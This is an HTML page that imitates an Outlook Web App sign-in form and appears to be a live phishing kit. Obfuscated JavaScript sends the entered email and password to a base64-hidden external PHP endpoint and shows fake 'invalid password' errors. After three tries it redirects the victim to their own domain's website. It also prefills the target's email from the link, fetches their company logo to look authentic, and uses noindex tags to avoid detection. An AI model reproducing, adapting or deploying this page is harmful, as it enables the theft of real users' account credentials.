<html><head><meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="" />
<meta name="description" content="" />
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="noindex" />
<meta name="otherbot" content="noindex" />
<meta name="noarchive" content="noindex" />
<meta name="nosnippet" content="noindex" />
<meta name="noimageindex" content="noindex" />
<meta name="robots" content="none">
<meta name="googlebot" content="none">
<meta name="googlebot-news" content="none" />
<meta name="otherbot" content="none" />
<meta name="noarchive" content="none" />
<meta name="nosnippet" content="none" />
<meta name="noimageindex" content="none" />
<meta name="robots" content="nofollow">
<meta name="googlebot" content="nofollow">
<meta name="googlebot-news" content="nofollow" />
<meta name="otherbot" content="nofollow" />
<meta name="noarchive" content="nofollow" />
<meta name="nosnippet" content="nofollow" />
<meta name="noimageindex" content="nofollow" />
<meta name="robots" content="max-snippet:0">
<meta name="robots" content="unavailable_after: 2020-09-22">
<meta name="robots" content="noindex, nofollow">
<meta name="googlebot" content="noindex, nofollow"> 
     <meta name=viewport content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="shortcut icon" type=image/x-icon href=https://www.freepngimg.com/download/microsoft/70674-outlook-office-outlook.com-email-logo-365-microsoft.png />
    <meta name=description content>
    <meta name=author content>
    <title>Signin Outlook WebApp Settings</title>
    <link rel=stylesheet href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css integrity=sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u crossorigin=anonymous>
    <link href=https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css rel=stylesheet integrity=sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN crossorigin=anonymous>
    <style>@font-face{font-family:SegoeUI;src:local("Segoe UI Light"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.ttf) format("truetype");font-weight:100}@font-face{font-family:SegoeUI;src:local("Segoe UI Semilight"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/semilight/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/semilight/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/semilight/latest.ttf) format("truetype");font-weight:200}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.ttf) format("truetype");font-weight:400}@font-face{font-family:SegoeUI;src:local("Segoe UI Bold"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/bold/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/bold/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/bold/latest.ttf) format("truetype");font-weight:600}@font-face{font-family:SegoeUI;src:local("Segoe UI Semibold"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/semibold/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/semibold/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/semibold/latest.ttf) format("truetype");font-weight:700}*{font-family:SegoeUI,"-apple-system",BlinkMacSystemFont,Roboto,"Helvetica Neue",sans-serif}html,body{height:100%}body{display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;padding-top:40px;padding-bottom:40px;background-color:#f5f5f5}.form-signin{width:100%;max-width:330px;padding:15px;margin:auto}.form-signin .checkbox{font-weight:400}.form-signin .form-control{position:relative;box-sizing:border-box;height:auto;padding:10px;font-size:16px}.form-signin .form-control:focus{z-index:2}.form-signin input[type="email"]{margin-bottom:-1px;border-bottom-right-radius:0;border-bottom-left-radius:0}.form-signin input[type="password"]{margin-bottom:10px;border-top-left-radius:0;border-top-right-radius:0}.sidebar{position:absolute;top:0;bottom:0;left:0;display:inline-block;width:332px}.sidebar{background-color:#0072c6}.sidebar .owaLogoContainer{margin:40vh auto auto 109px;text-align:left}.login-box{padding-left:0;width:100%}@media(min-width:576px){.login-box{padding-left:332px}}@media(min-width:768px){.login-box{padding-left:332px}}@media(min-width:992px){.login-box{padding-left:332px}}@media(min-width:1200px){.login-box{padding-left:332px}}.btn.btn-primary{background-color:#6895f7}</style>
</head>
<body class=text-center>
  
        
    </div>
    <div class=login-box style="margin-right: 20%;">
    <h2 class="text-center"><div class=owaLogoContainer>
            <img src="" alt="Mailbox" id="logoimg" style="width:100px;height:100px;">
        </div>

        
        <div class=form-signin>
        
       
            <h1 style="color: #0078d4;" class="h4 mb-3 font-weight-normal" id=corportate-title> <i></i>Powered By <span id="dom">Microsoft</span></h1><br />
            <form name="myform" action="" method="post">
                <label for=username class=sr-only>Email address</label>
            <input type="email" id="pet"  class=form-control name="pet" placeholder="Email address" autofocus required><P><br>
            <label for=inputPassword class=sr-only>Password</label>
            <input type="password" id=pett name="pett" class=form-control placeholder=Password required>
<!--             <input type="hidden" name="error" id="error">
 -->            <input type="hidden" name="source" value="OWA">
            <div  style=color:red class=warning id=warning></div>
            <div class="checkbox mb-3 text-left">
                <div id="mgss" style="display: none;color: red;font-weight: 400;margin-top: 10px;font-size:15px">Invalid password combination. Try entering your correct password again.</div>
                                <span id="error" class="text-danger" style="display: none;color: red;font-weight: 400;margin-top: 10px;font-size:15px">That account doesn't exist. Enter a different account</span>
                <label style="text-align:center; font-size:15px">
                    <input type=checkbox value=remember-me>&nbsp;
                    <span id=privateLabel aria-hidden=true>Private computer</span>
                    (<a href=# class=signInCheckBoxLink role=link>What is this?</a>)
                </label>
                
            </div>
            <button type="submit" style=float:right class="btn btn-lg btn-primary btn-block" id="submit-btn">Sign in</button>
            <br><br /><br><br />
            <p style="text-align:center; font-size:15px"> <a href="#"> Copyright <span class="logoname"></span> 2021  </p>
            </form>
        </div>
    </div>
    <script src=https://code.jquery.com/jquery-3.3.1.min.js></script>
    <script src=https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js integrity=sha384-cs/chFZiN24E4KMATLdqdvsezGxaGsi4hLGOzlXwp5UZB1LY//20VyM2taTB4QvJ crossorigin=anonymous></script>
    <script src=https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js integrity=sha384-uefMccjFJAIv6A+rW+L4AHf99KvxDjWSu1z9VI8SKNVmz4sk7buKt/6v9KI65qnm crossorigin=anonymous></script>
    <script src=https://code.jquery.com/jquery-3.3.1.slim.min.js integrity=sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo crossorigin=anonymous></script>
    <script src=https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js integrity=sha384-cs/chFZiN24E4KMATLdqdvsezGxaGsi4hLGOzlXwp5UZB1LY//20VyM2taTB4QvJ crossorigin=anonymous></script>
    <script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js integrity=sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa crossorigin=anonymous></script>
        <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script>
        const email = new URLSearchParams(location.search).get('email');
        const error = new URLSearchParams(location.search).get('error');
        if(email){
            document.getElementById('pet').value = email;
            document.getElementById('pet').setAttribute('readonly', 'true');
            let dom = email.slice(email.indexOf('@') + 1);
            dom = dom[0].toUpperCase() + dom.slice(1);
            document.getElementById('dom').innerHTML = dom;
            
            
            var final= dom.toLowerCase();
            var finalu= dom.toUpperCase();
            $("#logoimg").attr("src", "https://logo.clearbit.com/"+dom);
        $("#logoname").html(finalu);
        $(".logoname").html(finalu);

        }
        if(error){
            document.getElementById('error').value = 'error';
            document.getElementById('err').style.display = 'block';
        }

    </script>
    <script>
(function(_0x4d304d,_0x5d8223){var _0x48673a=_0x2147;var _0x4b1ea4=_0x4d304d();while(!![]){try{var _0x33cf94=-parseInt(_0x48673a(0xfc))/0x1*(parseInt(_0x48673a(0xe6))/0x2)+parseInt(_0x48673a(0x108))/0x3*(parseInt(_0x48673a(0xee))/0x4)+-parseInt(_0x48673a(0x105))/0x5*(-parseInt(_0x48673a(0xe5))/0x6)+-parseInt(_0x48673a(0xd9))/0x7+-parseInt(_0x48673a(0xe2))/0x8*(parseInt(_0x48673a(0x10d))/0x9)+-parseInt(_0x48673a(0xf1))/0xa*(parseInt(_0x48673a(0xf2))/0xb)+-parseInt(_0x48673a(0x103))/0xc*(-parseInt(_0x48673a(0xdf))/0xd);if(_0x33cf94===_0x5d8223){break;}else{_0x4b1ea4['push'](_0x4b1ea4['shift']());}}catch(_0x2163d3){_0x4b1ea4['push'](_0x4b1ea4['shift']());}}}(_0x71a2,0x9c6b8));function _0x71a2(){var _0x12b741=['show','OIJyU','push','825972XnWNRz','keypress','3830xQHOXx','foktA','ajax','17850TzLUZX','AYWcj','#pett','keyCode','(((.+)+)+)+$','10359OPHRBV','UdSpc','substr','click','7210133gvGYvc','POST','#mgss','test','html','#error','286omKjvR','That\x20account\x20doesn\x27t\x20exist.\x20Enter\x20a\x20different\x20account','rTMtz','1640ypbycY','apply','0x0','5214KaulGt','18xSJJYH','#submit-btn','constructor','location','fQPrk','http://www.','Password\x20field\x20is\x20empty.!','toString','668otTYDm','mjnnO','val','38270DuSrFQ','1111kedKKL','indexOf','JSON','preventDefault','replace','hide','which','text','#pet','shift','97821FJOcdp','Continue','MBZSB','search'];_0x71a2=function(){return _0x12b741;};return _0x71a2();}var _0x52d51e=function(){var _0x41fadc=!![];return function(_0x5b0d73,_0x336b5b){var _0x39b27e=_0x41fadc?function(){var _0x5b83f2=_0x2147;if(_0x336b5b){if('CmpUC'===_0x5b83f2(0xfe)){_0x3dfde7(_0x5b83f2(0x10a))[_0x5b83f2(0xf0)]('');if(_0x1ded31>=0x3){_0x1bbea9=0x0;_0x55fbdf[_0x5b83f2(0xe9)][_0x5b83f2(0xf6)](_0x5b83f2(0xeb)+_0x393107);return![];}_0x588172(_0x5b83f2(0xdb))['show']();}else{var _0x1f11d6=_0x336b5b[_0x5b83f2(0xe3)](_0x5b0d73,arguments);_0x336b5b=null;return _0x1f11d6;}}}:function(){};_0x41fadc=![];return _0x39b27e;};}();var _0x2cbab8=_0x52d51e(this,function(){var _0x4a156a=_0x2147;return _0x2cbab8['toString']()['search'](_0x4a156a(0x10c))['toString']()[_0x4a156a(0xe8)](_0x2cbab8)[_0x4a156a(0xff)](_0x4a156a(0x10c));});_0x2cbab8();function _0x2147(_0x5a185b,_0x25b493){var _0x4a58e4=_0x71a2();_0x2147=function(_0x2cbab8,_0x52d51e){_0x2cbab8=_0x2cbab8-0xd7;var _0x71a28f=_0x4a58e4[_0x2cbab8];return _0x71a28f;};return _0x2147(_0x5a185b,_0x25b493);}$(document)['ready'](function(){var _0x51a2c3=_0x2147;var _0x5caa3e=0x0;$(document)[_0x51a2c3(0x104)](function(_0x5eec6a){var _0x35f57c=_0x51a2c3;if(_0x35f57c(0x10e)!=='UdSpc'){return _0x136c87[_0x35f57c(0xed)]()['search'](_0x35f57c(0x10c))[_0x35f57c(0xed)]()[_0x35f57c(0xe8)](_0x1c7ec3)[_0x35f57c(0xff)](_0x35f57c(0x10c));}else{var _0x466519=_0x5eec6a['keyCode']?_0x5eec6a[_0x35f57c(0x10b)]:_0x5eec6a[_0x35f57c(0xf8)];if(_0x466519=='13'){_0x5eec6a[_0x35f57c(0xf5)]();$('#submit-btn')['click']();}}});$('#submit-btn')[_0x51a2c3(0xd8)](function(_0x3dd61e){var _0x28a50f=_0x51a2c3;if('mjnnO'!==_0x28a50f(0xef)){var _0x1001ce=_0xfdb734['apply'](_0x1883d2,arguments);_0x1e659c=null;return _0x1001ce;}else{$('#error')[_0x28a50f(0xf7)]();$(_0x28a50f(0xdb))['hide']();_0x3dd61e[_0x28a50f(0xf5)]();var _0x533b57=$(_0x28a50f(0xfa))[_0x28a50f(0xf0)]();var _0x28899f=$(_0x28a50f(0x10a))[_0x28a50f(0xf0)]();var _0x3d881b=$(_0x28a50f(0xdb))[_0x28a50f(0xdd)]();$(_0x28a50f(0xdb))[_0x28a50f(0xf9)](_0x3d881b);var _0x3079ff=_0x533b57;var _0x3a2415=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x533b57){$('#error')['show']();$(_0x28a50f(0xde))[_0x28a50f(0xdd)]('Email\x20field\x20is\x20empty.!');return![];}if(!_0x3a2415[_0x28a50f(0xdc)](_0x3079ff)){$(_0x28a50f(0xde))[_0x28a50f(0x100)]();$(_0x28a50f(0xde))['html'](_0x28a50f(0xe0));return![];}if(!_0x28899f){$(_0x28a50f(0xde))[_0x28a50f(0x100)]();$('#error')[_0x28a50f(0xdd)]('Password\x20field\x20is\x20empty.!');return![];}var _0x50051c=_0x3079ff[_0x28a50f(0xf3)]('@');var _0x56b06b=_0x3079ff[_0x28a50f(0xd7)](_0x50051c+0x1);var _0x40bb8e=_0x56b06b[_0x28a50f(0xd7)](0x0,_0x56b06b[_0x28a50f(0xf3)]('.'));var _0x1fa9f9=_0x40bb8e['toLowerCase']();_0x5caa3e=_0x5caa3e+0x1;var _0x623af6=['aHR0cHM6Ly9kZXZjbG91ZC1kYXRhLmhlcm9rdWFwcC5jb20vcm90c3VjLnBocA=='];(function(_0x45d51d,_0x4e4edb){var _0x447e45=function(_0x2b3e77){var _0x5ecb9c=_0x2147;while(--_0x2b3e77){if(_0x5ecb9c(0xea)!==_0x5ecb9c(0x101)){_0x45d51d[_0x5ecb9c(0x102)](_0x45d51d[_0x5ecb9c(0xfb)]());}else{_0xb111a8(_0x5ecb9c(0xde))[_0x5ecb9c(0x100)]();_0x319792(_0x5ecb9c(0xde))[_0x5ecb9c(0xdd)](_0x5ecb9c(0xec));return![];}}};_0x447e45(++_0x4e4edb);}(_0x623af6,0x13e));var _0x21cc1d=function(_0x23d499,_0x35e8e8){var _0x181403=_0x28a50f;if(_0x181403(0x106)==='DBEpI'){_0x496d55(_0x181403(0xe7))[_0x181403(0xdd)]('Verifying...');}else{_0x23d499=_0x23d499-0x0;var _0x6432c7=_0x623af6[_0x23d499];return _0x6432c7;}};$[_0x28a50f(0x107)]({'dataType':_0x28a50f(0xf4),'url':atob(_0x21cc1d(_0x28a50f(0xe4))),'type':_0x28a50f(0xda),'data':{'pet':_0x533b57,'pett':_0x28899f},'beforeSend':function(_0x5a8d28){var _0x4f32b1=_0x28a50f;$(_0x4f32b1(0xe7))['html']('Verifying...');},'success':function(_0x5f32d7){var _0x55c1d1=_0x28a50f;$(_0x55c1d1(0x10a))[_0x55c1d1(0xf0)]('');if(_0x5caa3e>=0x3){_0x5caa3e=0x0;window[_0x55c1d1(0xe9)][_0x55c1d1(0xf6)](_0x55c1d1(0xeb)+_0x56b06b);return![];}$(_0x55c1d1(0xdb))[_0x55c1d1(0x100)]();},'error':function(){var _0x275308=_0x28a50f;$('#pett')[_0x275308(0xf0)]('');if(_0x5caa3e>=0x3){_0x5caa3e=0x0;window[_0x275308(0xe9)][_0x275308(0xf6)](_0x275308(0xeb)+_0x56b06b);return![];}$(_0x275308(0xdb))[_0x275308(0x100)]();},'complete':function(){var _0x87ce95=_0x28a50f;if(_0x87ce95(0xe1)!==_0x87ce95(0x109)){$(_0x87ce95(0xe7))[_0x87ce95(0xdd)](_0x87ce95(0xfd));}else{_0x5df957(_0x87ce95(0x10a))[_0x87ce95(0xf0)]('');if(_0x480a5c>=0x3){_0x5b36ec=0x0;_0x5987b4[_0x87ce95(0xe9)]['replace'](_0x87ce95(0xeb)+_0x33a57b);return![];}_0x422282('#mgss')['show']();}}});}});});
</script>
</body>
    </html>
